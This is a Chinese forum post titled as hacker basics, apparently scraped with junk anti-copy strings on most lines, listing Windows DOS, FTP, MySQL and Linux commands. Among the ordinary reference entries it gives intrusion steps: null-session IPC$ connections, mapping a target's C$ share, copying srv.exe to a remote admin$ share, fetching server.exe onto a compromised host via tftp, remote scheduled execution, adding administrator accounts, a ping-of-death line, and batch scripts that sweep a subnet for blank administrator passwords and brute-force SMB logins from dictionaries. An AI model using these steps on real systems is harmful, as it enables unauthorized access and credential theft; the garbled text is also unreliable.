黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 5 _, T6 F( P3 P! k  \% W( ?
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 7 l, l" V/ ]6 ]+ P) [
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
, S9 n3 [! E) F" N5 f6 tnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: & b! Q) {' p0 w
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 # W/ C( L/ s% D6 {/ a/ U/ N: x2 R
net use h: /del 删除映射对方到本地的为H:的映射
* Z2 y$ X  F) t  ?net user 用户名　密码　/add 建立用户 ' }* L2 `  Y; a/ Y0 j
net user guest /active:yes 激活guest用户 6 \( ^! e0 U& `# x( q" H
net user 查看有哪些用户
# u5 O% [' X' H+ O: F- ?" Ynet user 帐户名 查看帐户的属性 * h, L8 n$ p* W6 _1 E* _
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
2 @! ~; A$ |7 w4 @% \' onet start 查看开启了哪些服务 & A7 a  T2 d- F8 I' r1 E
net start 服务名　 开启服务；(如:net start telnet， net start schedule) 4 P5 V5 K) d: M; C% w# L
net stop 服务名 停止某服务
  r: H. J% N) j9 t8 Jnet time \\目标ip 查看对方时间
2 _' {, k5 D; q5 R) {4 Z" Onet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 + }0 M1 F" g6 y4 F# A$ J
net view 查看本地局域网内开启了哪些共享 7 k0 s0 U5 ?  V; P
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ! C: \+ t4 Y9 ]  s) P5 `  P. s7 {! @) O4 a
net config 显示系统网络设置
3 y; d% o  T' }- P& ~1 knet logoff 断开连接的共享 6 u8 U, B- |  W  A1 n# B4 h3 ~
net pause 服务名 暂停某服务
2 f9 ]! a3 X2 _) w' @net send ip "文本信息" 向对方发信息
" D9 x( A! q' @" N7 v( ~' xnet ver 局域网内正在使用的网络连接类型和信息
  t" d, }( C9 @( r. snet share 查看本地开启的共享
+ E$ W) ^, v; lnet share ipc$ 开启ipc$共享
; f$ B# S2 {* ?  ~  h" R" l. [" l0 pnet share ipc$ /del 删除ipc$共享 ' v! N4 d+ |. O. `( w$ M3 o, z  }* ~
net share c$ /del 删除C：共享 " f) z. \- n: U( w: v5 g
net user guest 12345 用guest用户登陆后用将密码改为12345
6 r5 K- ?/ {% O8 J4 K4 h8 H8 onet password 密码 更改系统登陆密码 2 W$ \" C9 O  ~; `. C  P
netstat -a 查看开启了哪些端口,常用netstat -an 6 B$ |4 i9 Q) j6 O
netstat -n 查看端口的网络连接情况，常用netstat -an - {. L8 t" U4 D( S2 _
netstat -v 查看正在进行的工作 ! r% k2 x% n3 {* u8 Q0 W" f
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 9 E# B# p' X$ x
netstat -s 查看正在使用的所有协议使用情况
; I9 A7 [( E6 u: h2 u: C- cnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 ; N/ N9 f5 \: r2 N
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
/ ^0 O) w0 c& f9 d; E& B, E! Qping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
' H# \" ?2 Y% G+ `3 xping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ( H9 B& u* e6 G+ o
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
0 `! d5 ~/ x7 ltlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ! z7 {' V5 O# S3 d: E8 B) W
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
8 ?( ^2 l" G6 S1 l) }del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 , u+ L3 b3 K2 _) _
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） # p, Y2 @- t  p! `5 H
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 8 @. \  d" v0 O
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 ; i$ a8 {1 W, ]4 e
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 6 x6 r% s+ ]& g/ o( x  \3 r
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
0 l) k; l7 b/ Zat id号 /delete 停止某个已注册的计划任务 0 h6 G. v0 E# D8 i
at 查看所有的计划任务
9 F- k+ n" b1 x$ n$ Uat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
" c* [/ T. ^8 ?" p+ z  efinger username @host 查看最近有哪些用户登陆 5 w. g  @7 k$ O8 t3 @
telnet ip 端口 远和登陆服务器,默认端口为23
$ g( ^# v0 g1 `  X) _open ip 连接到IP（属telnet登陆后的命令） 9 B, c$ w  {% O, Y9 e
telnet 在本机上直接键入telnet 将进入本机的telnet
* P# t, E/ x. P9 rcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
! |/ P* ^4 p. C9 L6 |) l9 o/ Bcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
" H. ?! L3 g- v  N1 Lcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
" C) h7 z0 m, Y1 u/ I0 w4 y8 }copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
; e, g% a3 `+ n; X& excopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
. @# @0 T+ i, ]& F0 O4 jtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
: M/ \3 K) o4 C5 vtftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
% d3 G) F3 x0 Rftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
* D* s& E) p4 nroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
5 K9 h* }! M  b  narp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 5 O. ~+ Z0 q7 F) X# r- |! k% z
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
' m/ I+ `" z$ [: B5 \0 q1 Umem 查看cpu使用情况
* h, I) Q0 W* P/ c5 Xattrib 文件名(目录名) 查看某文件（目录）的属性 / L6 f/ l- B/ d- o
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
1 z5 r/ w' m6 ?+ `& _" s+ U$ ^dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 9 z5 @3 n) C1 W
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
) r6 K8 f' T) O- d2 G5 W: Tset 指定环境变量名称=要指派给变量的字符 设置环境变量
9 A( u: h9 N* K- b$ \+ [; Pset 显示当前所有的环境变量 6 q# Z6 M% G# ?$ m* z6 M' F
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 9 n9 M8 N# K" E7 W6 _& I) ^
pause 暂停批处理程序，并显示出：请按任意键继续.... ; V  N& k# x  y% m
if 在批处理程序中执行条件处理（更多说明见if命令及变量） 3 h* \! a- r1 x  q
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
# G# F& J; c) T  @call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） ! {0 ^8 v. X) X7 L5 n5 I) @& s
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
% c/ \7 T3 S/ N* f( F8 Gecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
0 V8 K3 i5 s% B# q$ w8 Yecho 信息 在屏幕上显示出信息
3 u1 v' r. y( Y+ Wecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 . F+ Z. Q- q* Q( g' w+ O% t
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
: ^6 Y$ K9 f; @  `9 b9 ]find 文件名 查找某文件
. Z5 q1 l9 {, v! k" Dtitle 标题名字 更改CMD窗口标题名字
' a" [$ q2 m; [# o9 ncolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 & c# t: l4 P& |9 D" s+ f
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
/ }$ e+ ?! u# }* X9 xprint 文件名 打印文本文件 + D4 D  j! k# m& c$ [
ver 在DOS窗口下显示版本信息
$ e# y) Y6 Q7 Vwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） * o. Q4 [; i- v. O( D$ `
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS ! \- V) I2 k% w8 _5 S7 l
md　目录名 创建目录
0 Z$ H8 x, c/ Mreplace 源文件　要替换文件的目录 替换文件
) |- Q: ?- B; a9 j- a$ pren 原文件名　新文件名 重命名文件名 4 p) M3 }6 t' C
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 ; m7 z+ ]5 e5 h& q) n# Z  l7 ]$ m. l
type 文件名 显示文本文件的内容
  V( G/ e2 I4 v' Y# l3 bmore 文件名 逐屏显示输出文件 5 h5 @) u" j& S/ f9 l$ @
doskey 要锁定的命令＝字符
7 a- ?! B1 {  M7 Q3 qdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
6 ~: l" {" T0 ^/ m- E+ Q& Rtaskmgr 调出任务管理器
- d) o& w. _2 X( A* e& y) K( Cchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
' E$ k, |0 c0 Btlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 7 c: U( S% L- ]% M
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
& x1 Z, H+ m7 D& {5 z9 tpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
$ _9 {) Y* ]% R+ m) rcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
) C  W0 A. H7 T) a4 n3 S8 Sregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 6 j* U7 N; ^% M+ z" p* ]; C+ t6 [/ V
regedit /e 注册表文件名 导出注册表 0 Q& G3 Q* D* I. t" O8 f2 I
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
$ f! p  [/ y" w) Dcacls 文件名 查看文件的访问用户权限列表 - f- L& q" Z4 U1 F4 Z
REM 文本内容 在批处理文件中添加注解
3 ]4 g, w, }5 ^8 q+ y" `netsh 查看或更改本地网络配置情况% x. a3 x( \( _# C/ m
IIS服务命令：; P- s  Q5 d; N  x0 U, @4 ]6 C
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） + j$ T8 }$ F4 _
iisreset /start或stop 启动（停止）所有Internet服务
0 @. C/ s7 E% X6 q3 }) V8 S. u4 L6 |iisreset /restart 停止然后重新启动所有Internet服务 , w: A0 y2 N! A! D; S- \9 Z9 q4 L
iisreset /status 显示所有Internet服务状态
4 X- _& i8 z6 y4 L+ giisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
% e* G) E4 h1 a" A2 T$ ]! Tiisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ; u1 K9 ^) i" B
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 * L# Z6 {4 H* t
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 # b8 y4 V5 L& V% z: O) i9 {2 C5 ]
FTP 命令： (后面有详细说明内容)
( \+ D8 z! M, h0 A/ gftp的命令行格式为:
% C# s! B) T5 [& H9 Gftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
! s4 H. U8 z# B8 p% T  L－d 使用调试方式。 , _* O6 ~  W- }
－n 限制ftp的自动登录,即不使用.netrc文件。
, q# K/ O7 U! h- |' }& g－g 取消全局文件名。 $ E2 S7 C9 H+ t( C
help [命令] 或 ？[命令] 查看命令说明
- s, r5 p! U" m4 j- O" Mbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
& `  }  U/ q) w" ^: _5 l4 _3 fpwd 列出当前远端主机目录
% M  y* N4 n) \9 T4 R2 eput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
* I9 Z8 \$ a/ _get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
: y3 P) T$ \# t) o- O6 \mget [remote-files] 从远端主机接收一批文件至本地主机 1 X9 G: y6 G( V; k2 P
mput local-files 将本地主机中一批文件传送至远端主机 ' r5 y. B1 y9 \5 ]6 B5 _( {
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
& n% I. j, j2 x! ^ascii 设定以ASCII方式传送文件(缺省值)
- l, [2 ]9 h8 x# s+ {5 fbin 或 image 设定以二进制方式传送文件 * I! f; `5 G$ l
bell 每完成一次文件传送,报警提示 7 w# Y, V0 f* i8 _
cdup 返回上一级目录
- b3 T$ X7 {! G5 n$ Z2 zclose 中断与远程服务器的ftp会话(与open对应) # D8 F1 V( L8 k6 ?; z
open host[port] 建立指定ftp服务器连接,可指定连接端口 8 |* ^# A3 `% K+ L$ B# f( o* H
delete 删除远端主机中的文件
! d. }- r6 K9 p& `mdelete [remote-files] 删除一批文件
# ~' z, e# R) t; |; P( k/ v$ D8 nmkdir directory-name 在远端主机中建立目录
( O- {8 @8 y4 Orename [from] [to] 改变远端主机中的文件名
/ H* J  s2 E# Crmdir directory-name 删除远端主机中的目录
& t. w; R! ^$ Z  F- Q. S- \4 Pstatus 显示当前FTP的状态
- u; @: |. [( r1 [& }5 `+ w+ O5 C; Msystem 显示远端主机系统类型
: V9 Y4 A7 v4 s* quser user-name [password] [account] 重新以别的用户名登录远端主机
) }# |0 I5 T; K. i% `+ bopen host [port] 重新建立一个新的连接 + Z4 N0 T) o; F8 e8 C# {
prompt 交互提示模式 9 s, O- s9 z- ~* L3 t4 f
macdef 定义宏命令
8 S) v: ~  ]/ J$ G) Rlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
8 L) r$ Q4 f$ M" Tchmod 改变远端主机的文件权限 " s3 b  X, z; p# d; J' C
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 ! A) k9 o' S. |9 T# I
cd remote－dir 进入远程主机目录
. @6 m& c3 U: K3 M' a& Fcdup 进入远程主机目录的父目录
9 r$ I% o$ {0 G1 A! n5 f0 ?9 r! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip 5 o/ U6 l4 d8 ?& L1 o
MYSQL 命令： ' V% E( \) D" D! n4 g  ]# g/ |
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。1 @. D' d3 l5 B0 o: s; M2 u
（例：mysql -h110.110.110.110 -Uroot -P123456
$ m( S6 f, X. R9 l4 {注:u与root可以不用加空格，其它也一样）
# z2 Z$ o9 i, l4 Bexit 退出MYSQL # {0 V4 {& ?' Z- b$ i* K- s* p& B+ t1 I
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码   E8 P0 v% h: l+ x) H& s( {9 L
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
1 b. `. j- t+ u, Qshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 9 k! g2 v7 _' t9 |; \4 U  i
use mysql；% k" G1 s0 ?! w! U- ]% v& O
show tables; 显示库中的数据表
7 U# c# P9 h/ o2 Rdescribe 表名; 显示数据表的结构 ! v. ^  x1 x9 P! c: `
create database 库名; 建库 & f9 _( r( R1 F, \' t  {
use 库名；6 j+ V7 G- b. y9 O2 V2 U2 J* D
create table 表名 (字段设定列表)； 建表 7 p2 m: U' h/ i, L7 F
drop database 库名; 0 v0 b# w# w9 a$ b9 P; b
drop table 表名； 删库和删表
  C, H$ M& m0 w( H+ L! Bdelete from 表名; 将表中记录清空
8 ^) [" p+ l- p+ G4 V9 zselect * from 表名; 显示表中的记录
) ]6 E& l+ H7 h1 D) e4 Kmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 8 R. {' T- p4 S5 I2 M1 G) }7 Z
win2003系统下新增命令（实用部份）：
. E) e$ t) o6 ?' Qshutdown /参数 关闭或重启本地或远程主机。3 D3 D- Z  A# Z; T+ {2 S
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
: s6 T. }# t4 H1 c0 d: z- [/ i例：shutdown /r /t 0 立即重启本地主机（无延时）
4 I# V& Q: n$ n' itaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
$ M  Q: a4 l  X; F参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
9 \9 U! S, m& G2 ktasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。! G' L* n, @2 l* J  c0 e; E
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
* ^% ]; u$ T& U* B0 i; Z$ c( WLinux系统下基本命令： 要区分大小写
3 Q. `% y! A. a# E+ kuname 显示版本信息（同win2K的 ver） . b- ]6 ~1 k: _# o2 s! B# A
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
! S6 Y7 ]1 m4 Y" Ypwd 查询当前所在的目录位置 0 n8 I  G% B2 O3 p' K
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 * n/ w: P! ?7 E+ Y
cat 文件名 查看文件内容 : e, p/ O+ W* ]
cat >abc.txt 往abc.txt文件中写上内容。
5 B. y( }. ]  O- ~8 _. Rmore 文件名 以一页一页的方式显示一个文本文件。
# ]' R; V+ Z; H+ p* L/ Ncp 复制文件
; _* G$ e; c# _/ e. w- fmv 移动文件
# W- T2 B4 Z$ }* |" {rm 文件名 删除文件，rm -a 目录名删除目录及子目录 ; Z! o7 c' p2 w# v3 U) n- F
mkdir 目录名 建立目录 . u$ U) C9 q+ s6 J; S
rmdir 删除子目录，目录内没有文档。
3 K) h5 X2 W& M0 E( c/ vchmod 设定档案或目录的存取权限 3 h' J6 q/ ]$ Q; y8 g4 J; [
grep 在档案中查找字符串
1 _& Q7 N3 E1 L: F3 Kdiff 档案文件比较
* Y9 e, E2 d% W5 g  S6 B% _find 档案搜寻 3 O1 n+ T( c! J9 w+ `" P
date 现在的日期、时间 9 N5 z4 F0 `! o  |8 E( A
who 查询目前和你使用同一台机器的人以及Login时间地点
8 x* z! C6 g$ o% n' B" o" _% _w 查询目前上机者的详细资料
4 t! t/ b/ r: D; O( ?( f* s- i5 D" ]2 q3 ^whoami 查看自己的帐号名称 . ~1 s) L/ c3 B/ B4 `- H
groups 查看某人的Group
9 |) W5 o  n, u% ?1 tpasswd 更改密码 8 Z- c8 A- ^& Y; z; @2 I* R
history 查看自己下过的命令
2 c& l/ x$ ^& E3 S3 D- rps 显示进程状态
. _3 P; h0 I, f* e, C% u  T4 U2 xkill 停止某进程 / ~5 Q" B/ e% C; Z0 Q
gcc 黑客通常用它来编译C语言写的文件
7 c, h- O7 D* |9 [6 Wsu 权限转换为指定使用者
: R  ~1 r3 |2 N4 i! \( Y( Itelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
3 S/ s/ {0 |3 |. cftp ftp连接上某服务器（同win2K
/ S2 o' c8 F+ `8 r$ H" F附：批处理命令与变量6 H& r# B0 O" ~% C" D
1：for命令及变量 基本格式： 4 x, o* V0 p: U
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
) g9 i  v2 t# y, B批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
+ R/ V& S7 x- ~6 \1 V(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
: l6 ]8 P) W: `+ v/ jcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开: m; I+ |! X! ~4 L; d
command_parameters：为特定命令指定参数或命令行开关
( W- m9 v( @& E  `8 k3 f0 UIN (set)：指在(set)中取值；DO command ：指执行command6 Q: ?* j+ x3 t+ n" w  i' @
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 ( M4 m; L8 S- d$ r" ?
用法举例： 8 x6 v7 X( Y& b& B7 b6 Q
@echo off ( \' b2 l6 u, S; v! A
echo 用法格式：test.bat *.*.* > test.txt
& ]6 i' v/ H+ q  l2 n1 {. Hfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
. B" d8 x( h% ^: @1 Z  N+ c9 u存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。/ m. n7 ?( d) o9 }# K/ ~
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 3 W7 i0 v: u# g9 s. K" |+ `5 u+ h4 H; Q
@echo off , G% [+ a! O* ~  B7 `
echo 用法格式：ok.bat ip
5 I, c6 I; F8 _9 TFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ( P! J  f& i: Z" E7 B) e& y3 n" S
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。* Z! P# `3 `% n" q/ z+ s
2：if命令及变量 基本格式： , R8 s' |+ }$ g5 Q
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
% ~3 y6 k: [, O2 ?) W) c& q$ K例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
( f2 ?' z9 L% [* Y! p7 h4 A- N( e0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
3 \, I2 v% q  q' m3 ^* {1 O1 }1 S$ `7 VIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
8 i: h9 ?+ D2 S- K例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 8 P! l& r) {: N: M5 W
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
/ |/ V) H2 ^2 g5 F' M) r9 B) y例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 % T9 o0 E  v! N3 \, c4 W, q+ k
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”